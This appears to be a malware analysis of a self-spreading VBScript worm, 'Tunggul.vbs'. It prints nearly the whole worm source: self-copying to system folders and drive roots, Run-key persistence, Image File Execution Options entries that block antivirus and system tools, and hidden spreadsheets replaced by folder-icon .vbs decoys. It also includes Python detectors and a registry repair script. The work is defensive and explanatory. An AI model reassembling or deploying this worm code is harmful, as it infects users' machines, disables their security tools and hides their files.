vbs tunggul kawung

Analysis of Tunggul.vbs:

Code:
on error resume next
Dim winpath, sispath, tempath, FlashDisk, fso, wsshell, nask, filekor
Dim Drives, Drive, cekdrive, tekvir, text, Buatfile, namafile, filetext
Dim DesPath1, DesPath2, Scut1, Scut2
Set fso = CreateObject("Scripting.FileSystemObject")
Set wsshell = CreateObject("WScript.Shell")
Set filetext = fso.OpenTextFile(WScript.ScriptFullName,1)
namafile = "Tunggul.vbs"
Set nask = fso.getfile(Wscript.ScriptFullname)
cekdrive = nask.drive.drivetype

Set winpath = fso.GetSpecialFolder(0)
Set sispath = fso.GetSpecialFolder(1)
Set tempath = fso.GetSpecialFolder(2)
Set text = nask.openastextstream(1, -2)
Randomize Timer
Aka=Int(rnd*1000)
Akb=Int(rnd*30)
If Akb=0 Then Akb=10
Tamb=String(Akb,"-")
tekavir = text.readline
tekvir="' "&Aka&Tamb&vbCrLf
Do While Not text.atendofstream
tekvir = tekvir&text.readline
tekvir = tekvir&vbCrLf
Loop
Shortcut()
sudah=0

The script above is the setup (settings/properties/arguments) for the script that follows: it reads its own source file, replaces the first line with a random comment (a random number followed by a random run of dashes, so that every copy it later writes differs slightly), keeps the body in tekvir, then calls Shortcut() and enters the main loop.

Code:
Do
Set filekor = fso.getfile(winpath & "\" & namafile)
filekor.Attributes = 32

Looks up the file ":\Windows\Tunggul.vbs"
and sets its attributes to "archive" (32) so that it can be overwritten.

Code:
Set filekor = fso.createtextfile(winpath & "\" & namafile, 2, True)
filekor.write tekvir
filekor.Close

Creates the file ":\Windows\Tunggul.vbs" (its own body, tekvir).

Code:
Set filekor = fso.getfile(winpath & "\" & namafile)
filekor.Attributes = 39

Sets the attributes of the Tunggul.vbs file.
I read
http://sallisawok.org/cas...es_property.htm
http://ns7.webmasters.com...es_property.htm
and there is no value 39 there.. probably a typo, eh..

Code:
For Each FlashDisk In fso.drives
If (FlashDisk.drivetype = 1 Or FlashDisk.drivetype = 2) And FlashDisk.Path <> "A:" Then
Set filekor = fso.getfile(FlashDisk.Path & "\" & namafile)
filekor.Attributes = 32
Set filekor = fso.createtextfile(FlashDisk.Path & "\" & namafile, 2, True)
filekor.write tekvir
filekor.Close
End If
Next

Creates Tunggul.vbs in the root of every removable or fixed drive (drivetype 1 or 2), skipping floppy A:.

Code:
rdw="REG_DWORD"
Smwc = "\Software\Microsoft\Windows\CurrentVersion\"
Hsmwci = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
wsshell.regwrite "HKLM"&Smwc&"Run\WinSistem", "wscript.exe " & winpath & "\" & namafile

Registers Tunggul.vbs to run at startup via the registry (HKLM\...\Run\WinSistem, launched through wscript.exe).

Code:
wsshell.regwrite Hsmwci&"cmd.exe\Debugger"," "
wsshell.regwrite Hsmwci&"msconfig.exe\Debugger"," "
wsshell.regwrite Hsmwci&"regedit.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-CLN.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-RTP.exe\Debugger"," "
wsshell.regwrite Hsmwci&"PCMAV-SE.exe\Debugger"," "
wsshell.regwrite Hsmwci&"VB6.exe\Debugger"," "
wsshell.regwrite Hsmwci&"autorun.exe\Debugger"," "
wsshell.regwrite Hsmwci&"ansav.exe\Debugger"," "
wsshell.regwrite Hsmwci&"ansavgd.exe\Debugger"," "
wsshell.regwrite Hsmwci&"viremoval.exeDebugger"," "
wsshell.regwrite Hsmwci&"avscan.exe\Debugger"," "
wsshell.regwrite Hsmwci&"avgnt.exe\Debugger"," "
wsshell.regwrite Hsmwci&"iexplore.exe\Debugger"," "
wsshell.regwrite Hsmwci&"firefox.exe\Debugger"," "

Blocks the EXE files listed above: a Debugger value under Image File Execution Options makes Windows start that value instead of the program, and a value of " " means the program never starts at all.
Note another typo in "viremoval.exeDebugger";
it should be "viremoval.exe\Debugger" (as written, it creates a value named viremoval.exeDebugger under the IFEO key instead of a subkey, so viremoval.exe is not blocked).

Code:
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFind", "1", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoFolderOptions", "1", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\Explorer\NoRun", "1", rdw

Removes/hides:
1. the "Search" and "Run" items in the Start menu.
2. the "Folder Options" item in Explorer.

Code:
wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableRegistryTools", "0", rdw
wsshell.RegWrite "HKCU"&Smwc&"Policies\System\DisableTaskMgr", "0", rdw

The intent was probably to block regedit and Task Manager, but once again a typo :D
The value should be "1", not "0".
Besides, regedit.exe was already blocked by the script above.

Code:
wsshell.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"

Changes the icon of VBScript files to a folder icon.
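To check a machine for all of the registry changes described above without running anything, here is an added Python example (not code from this post) that reads a registry export (as produced by regedit's Export or "reg export") and flags the Run entry handing a .vbs to the script host, any Debugger value under Image File Execution Options, the Explorer/System policy values set to 1, and the vbsfile icon change. The embedded .reg text is constructed for the demo; the key and value names are the ones the worm writes. It also shows the RegWrite subtlety: a path without a trailing backslash writes a value named DefaultIcon under HKCR\vbsfile rather than the default value of the DefaultIcon key, so both places are checked.

```python
"""Scan a Windows registry export (.reg text) for the changes Tunggul.vbs makes:
the Run entry, Image File Execution Options "Debugger" values, the Explorer and
System policy restrictions, and the vbsfile icon hijack.

Added example for this analysis; not code from the post. SAMPLE_REG is a
constructed export, not a capture from a real host.
"""
import re
from typing import Dict, List, Tuple

IFEO = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
RUN_KEYS = (
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
)
POLICY_VALUES = {
    r"hkey_current_user\software\microsoft\windows\currentversion\policies\explorer":
        ("NoFind", "NoFolderOptions", "NoRun"),
    r"hkey_current_user\software\microsoft\windows\currentversion\policies\system":
        ("DisableRegistryTools", "DisableTaskMgr"),
}
VBSFILE = r"hkey_classes_root\vbsfile"

# Constructed sample export: one Run entry from the worm, one benign entry,
# one IFEO block, two policies set, one left at 0, and the stray DefaultIcon value.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WinSistem"="wscript.exe C:\\WINDOWS\\Tunggul.vbs"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"=" "

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoFind"=dword:00000001
"NoRun"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CLASSES_ROOT\vbsfile]
"DefaultIcon"="shell32.dll,2"

[HKEY_CLASSES_ROOT\vbsfile\DefaultIcon]
@="%SystemRoot%\\System32\\WScript.exe,2"
'''


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg reader: {key path (lower-cased): {value name: data}}.
    Understands "name"="string", "name"=dword:xxxxxxxx and @= (the key's default
    value, stored under the empty name)."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = re.match(r'^(@|"([^"]*)")=(.*)$', line)
        if current is None or not m:
            continue
        name = "" if m.group(1) == "@" else m.group(2)
        data = m.group(3)
        if data.startswith("dword:"):
            data = str(int(data[6:], 16))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = data
    return keys


def find_indicators(keys: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (category, detail) pairs for each setting the worm is known to write."""
    findings: List[Tuple[str, str]] = []
    for path, values in keys.items():
        # Any Debugger value under IFEO\<program>: Windows starts the "debugger"
        # instead of the program, and a blank one means the program never starts.
        if path.startswith(IFEO + "\\"):
            for name, data in values.items():
                if name.lower() == "debugger":
                    findings.append(("ifeo-debugger", f"{path[len(IFEO) + 1:]} -> {data!r}"))
        # Autostart entries that hand a .vbs to wscript/cscript.
        if path in RUN_KEYS:
            for name, cmd in values.items():
                low = cmd.lower()
                if "script" in low and ".vbs" in low:
                    findings.append(("run-vbs", f"{name}: {cmd}"))
        # Explorer / System lockdown policies set to 1.
        for name in POLICY_VALUES.get(path, ()):
            if values.get(name) == "1":
                findings.append(("policy-lockdown", name))
        # Icon hijack: a stray "DefaultIcon" value under vbsfile (what RegWrite without a
        # trailing backslash produces), or the DefaultIcon key's default not naming WScript.exe.
        if path == VBSFILE and "DefaultIcon" in values:
            findings.append(("vbs-icon", "vbsfile\\DefaultIcon value = " + values["DefaultIcon"]))
        if path == VBSFILE + r"\defaulticon" and "wscript.exe" not in values.get("", "").lower():
            findings.append(("vbs-icon", "DefaultIcon default = " + values.get("", "")))
    return findings


if __name__ == "__main__":
    for category, detail in find_indicators(parse_reg(SAMPLE_REG)):
        print(f"{category:16} {detail}")
```

Run it against a real export by replacing SAMPLE_REG with the file's contents; exports written by regedit are UTF-16, so open them with encoding="utf-16".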

Code:
If Minute(Now)=1 and sudah<>1 Then
Tularifiledoc()
sudah=1
End If
If cekdrive <> 1 Then Wscript.sleep 100000
Loop While cekdrive <> 1

Sub Tularifiledoc()
Set Drives=fso.drives
For Each Drive In Drives
If Drive<>"A:" Then
If Drive.IsReady Then
Cari Drive & "\"
End If
End If
Next
End sub

Plants the malware alongside document files (.DOC?) on every drive,
which makes the system noticeably slow.

Code:
Sub Shortcut()
DesPath1 = wsshell.SpecialFolders("Desktop")
DesPath2 = wsshell.SpecialFolders("StartUp")
Set Scut1 = wsshell.CreateShortcut(DesPath1 & "\Harry Potter.lnk")
Set Scut2 = wsshell.CreateShortcut(DesPath2 & "\Bogor Kota Hujan.lnk")
Set Fileke1 = fso.createtextfile(sispath& "\iexplore.vbs", 2, True)
Set Fileke2 = fso.createtextfile(tempath& "\Bogor.vbs", 2, True)
Fileke1.Write tekvir
Fileke1.Close()
Scut1.TargetPath = wsshell.ExpandEnvironmentStrings(sispath&"\iexplore.vbs")
Scut1.Save
Fileke2.Write tekvir
Fileke2.Close()
Scut2.TargetPath = wsshell.ExpandEnvironmentStrings(tempath&"\Bogor.vbs")
Scut2.Save
End Sub

Creates the files:
.\Windows\system32\iexplore.vbs
%temp%\Bogor.vbs
and creates shortcuts to them on the Desktop ("Harry Potter") and in the Startup folder ("Bogor Kota Hujan").

Code:
Function Cari(Path)
On Error Resume Next
Dim Folder, Subfolder, SubFolders, File, Files, filekor
Set Folder=fso.GetFolder(Path)
Set Files=Folder.Files
For Each File In Files
If fso.GetExtensionName(File.Path)="xls" Then
namfa=fso.GetBaseName(File.Path)
Set filekor = fso.GetFile(File.Path)
filekor.Attributes = 39
Set Buatfile=fso.CreateTextFile(File.ParentFolder & "\" & namfa & ".vbs")
Buatfile.Write tekvir
Buatfile.Close()
End If
Next
Set SubFolders=Folder.SubFolders
For Each Subfolder In Subfolders
Cari Subfolder.Path
Next
End Function

1. Searches every folder for .XLS files.
2. Creates a .VBS file with the same name as the .XLS, in the folder where that .XLS resides.
3. Sets the file type to "File Folder".
From here the user is deceived, because the malware earlier changed the .VBS icon to a folder icon, while the real .XLS is given attributes 39 (ReadOnly + Hidden + System + Archive) and so disappears from a default Explorer view.
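The cleanup section below only repairs the registry, so the .vbs copies that Cari() left beside every .xls still have to be found. The following added Python example (not code from this post) walks a directory tree, looks for a .vbs file next to a same-named .xls, confirms the file carries the worm's random first line and the strings from its body, then renames the copy so the script host no longer handles it and, on Windows, clears the Hidden/System bits on the real spreadsheet. The sample tree it builds is constructed for the demo; the marker strings come from the script analysed above.

```python
"""Find and neutralise the .vbs copies that Cari() plants beside .xls files.

Added example for this analysis; not code from the post. The directory tree
built by build_sample_tree() is constructed for the demo.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Every copy starts with the random line the worm generates: a quote, a space,
# a number (Aka) and a run of dashes (Tamb), e.g. "' 417----------".
RANDOM_HEADER = re.compile(r"^' \d+-+\s*$")
# Fragments the copied body always carries, taken from the script above.
BODY_MARKERS = ("image file execution options", "tunggul.vbs", "createtextfile")


def looks_like_tunggul(vbs: Path) -> bool:
    """Header line plus all body markers present: treat the file as a worm copy."""
    try:
        text = vbs.read_text(encoding="latin-1")
    except OSError:
        return False
    first = text.splitlines()[0] if text else ""
    lowered = text.lower()
    return bool(RANDOM_HEADER.match(first)) and all(m in lowered for m in BODY_MARKERS)


def find_planted_scripts(root: Path) -> List[Path]:
    """Return worm copies that sit next to a same-named .xls, the pattern Cari() leaves."""
    hits: List[Path] = []
    for dirpath, _dirs, files in os.walk(root):
        lower_names = {f.lower() for f in files}
        for f in files:
            stem, ext = os.path.splitext(f)
            if ext.lower() == ".vbs" and (stem.lower() + ".xls") in lower_names:
                candidate = Path(dirpath) / f
                if looks_like_tunggul(candidate):
                    hits.append(candidate)
    return sorted(hits)


def quarantine(hits: List[Path], dry_run: bool = True) -> List[Path]:
    """Rename each copy so wscript.exe no longer handles it and, on Windows, clear the
    ReadOnly/Hidden/System bits (attributes 39) the worm set on the real spreadsheet.
    Returns the .xls paths that were (or, in a dry run, would be) restored."""
    restored: List[Path] = []
    for vbs in hits:
        xls = vbs.with_suffix(".xls")
        if not dry_run:
            vbs.rename(vbs.with_name(vbs.name + ".quarantined"))
            if os.name == "nt":
                import ctypes
                FILE_ATTRIBUTE_ARCHIVE = 0x20  # leave only the Archive bit set
                ctypes.windll.kernel32.SetFileAttributesW(str(xls), FILE_ATTRIBUTE_ARCHIVE)
        restored.append(xls)
    return restored


def build_sample_tree(base: Path) -> Path:
    """Constructed sample: one planted copy, one legitimate .vbs beside an .xls, one lone .xls."""
    worm_body = (
        "' 417----------\n"
        "on error resume next\n"
        "namafile = \"Tunggul.vbs\"\n"
        "Hsmwci = \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\"\n"
        "Set filekor = fso.createtextfile(winpath & \"\\\" & namafile, 2, True)\n"
    )
    (base / "laporan").mkdir()
    (base / "laporan" / "budget.xls").write_bytes(b"constructed spreadsheet bytes")
    (base / "laporan" / "budget.vbs").write_text(worm_body)
    (base / "tools").mkdir()
    (base / "tools" / "backup.xls").write_bytes(b"constructed spreadsheet bytes")
    (base / "tools" / "backup.vbs").write_text("' backup helper\nWScript.Echo \"ok\"\n")
    (base / "data.xls").write_bytes(b"constructed spreadsheet bytes")
    return base


def run_demo() -> Dict[str, object]:
    """Build the sample tree, scan it, quarantine what was found, and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(Path(tmp))
        hits = find_planted_scripts(root)
        restored = quarantine(hits, dry_run=False)
        return {
            "hits": [h.relative_to(root).as_posix() for h in hits],
            "restored": [r.relative_to(root).as_posix() for r in restored],
            "originals_gone": not any(h.exists() for h in hits),
            "quarantined": all(h.with_name(h.name + ".quarantined").exists() for h in hits),
        }


if __name__ == "__main__":
    print(run_demo())
```

On a real machine call find_planted_scripts(Path("C:/")) first with quarantine(hits) in its default dry-run mode and review the list before renaming anything; the legitimate backup.vbs in the sample is deliberately left alone because it lacks the worm's header.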

Cleanup Steps:

* Repair the registry.
Copy and paste the following code into Notepad, save it as filename.VBS, then double-click the file.
Code:
' Repair script: undoes the registry changes made by Tunggul.vbs.
' RegDelete raises an error for a key that is already gone, so keep going.
On Error Resume Next
Set WshShell = Wscript.CreateObject("Wscript.Shell")
Smwc = "\Software\Microsoft\Windows\CurrentVersion\"
Hsmwci = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\"
' Startup entry
WshShell.RegDelete "HKLM"&Smwc&"Run\WinSistem"
' Image File Execution Options keys that blocked these programs (a trailing "\" deletes the whole key)
WshShell.RegDelete Hsmwci&"cmd.exe\"
WshShell.RegDelete Hsmwci&"msconfig.exe\"
WshShell.RegDelete Hsmwci&"regedit.exe\"
WshShell.RegDelete Hsmwci&"PCMAV.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-CLN.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-RTP.exe\"
WshShell.RegDelete Hsmwci&"PCMAV-SE.exe\"
WshShell.RegDelete Hsmwci&"VB6.exe\"
WshShell.RegDelete Hsmwci&"autorun.exe\"
WshShell.RegDelete Hsmwci&"ansav.exe\"
WshShell.RegDelete Hsmwci&"ansavgd.exe\"
WshShell.RegDelete Hsmwci&"avscan.exe\"
WshShell.RegDelete Hsmwci&"avgnt.exe\"
WshShell.RegDelete Hsmwci&"iexplore.exe\"
WshShell.RegDelete Hsmwci&"firefox.exe\"
' The mistyped write created a value (not a key) directly under IFEO; remove it too
WshShell.RegDelete Hsmwci&"viremoval.exeDebugger"
' Explorer / System policies that hid Search, Run, Folder Options and (intended) regedit / Task Manager
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoFind"
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoFolderOptions"
WshShell.RegDelete "HKCU"&Smwc&"Policies\Explorer\NoRun"
WshShell.RegDelete "HKCU"&Smwc&"Policies\System\DisableRegistryTools"
WshShell.RegDelete "HKCU"&Smwc&"Policies\System\DisableTaskMgr"
' Restore the normal VBScript icon and type name. Without a trailing "\" RegWrite writes a value
' named DefaultIcon under HKCR\vbsfile (which is where the worm's write landed); with the trailing
' "\" it sets the default value of the DefaultIcon key, which is the one Explorer reads.
WshShell.RegDelete "HKCR\vbsfile\DefaultIcon"
WshShell.RegWrite "HKCR\vbsfile\DefaultIcon\", "%SystemRoot%\System32\WScript.exe,2"
WshShell.RegWrite "HKCR\vbsfile\", "VBScript Script File"
' This only repairs the registry: Windows\Tunggul.vbs, system32\iexplore.vbs, %temp%\Bogor.vbs,
' the "Harry Potter" and "Bogor Kota Hujan" shortcuts and the .vbs copies beside .xls files
' still have to be deleted, and the hidden .xls files unhidden.
